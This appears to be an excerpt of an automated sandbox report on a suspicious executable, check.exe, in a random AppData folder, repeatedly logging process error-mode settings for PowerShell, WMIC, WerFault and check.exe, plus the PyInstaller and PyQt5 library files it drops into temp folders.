Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5613Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4052Jump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\QtCore.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\platforms\qwindows.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\opengl32sw.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\QtCore.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\QtGui.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qjpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platforms\qminimal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qjpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\python313.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Qml.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qico.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qminimal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qico.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Network.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qtiff.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\select.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qgif.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\QtGui.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qicns.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\select.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5DBus.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qoffscreen.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Quick.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5QmlModels.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\select.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Qml.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qwbmp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5WebSockets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\platforms\qoffscreen.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\libEGL.dllJump to dropped file
